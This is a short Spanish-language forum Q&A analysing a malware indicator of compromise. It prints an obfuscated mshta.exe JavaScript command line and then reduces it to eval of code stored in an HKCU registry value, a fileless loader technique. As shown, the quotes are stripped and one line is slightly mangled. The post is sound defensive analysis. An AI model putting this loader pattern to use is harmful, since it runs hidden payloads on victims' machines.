Tengo un IOC que tiene un argumento de línea de comando que se ve así a continuación. Quería ver si alguien podría ayudarme a analizarlo un poco para comprender lo que está sucediendo.
C:\Windows\System32\mshta.exe javascript:GO3sOtu=BN1;Z0y=new%20ActiveXObject(WScript.Shell);Aer53IGv=BY5S;Quaj7=Z0y.RegRead(HKCU\software\najpigann\hspi);RDYKO79Ji=0xq;eval(Quaj7);YWy5A0Za=Fl2JV;
mshta.exe analiza el código web para que se ejecute.
Si toma el Javascript y lo ejecuta a través de un beautifier :
GO3sOtu = BN1;
Z0y = new ActiveXObject(WScript.Shell);
Aer53IGv = BY5S;
Quaj7 = Z0y.RegRead(HKCU\ software\ najpigann\ hspi);
RDYKO79Ji = 0x q;
eval(Quaj7);
YWy5A0Za = Fl2JV;
En este punto, es sencillo reconstruir el flujo de código:
eval(new ActiveXObject(WScript.Shell).RegRead(HKCU\software\najpigann\hspi))
Lea otras preguntas en las etiquetas javascript ioc registry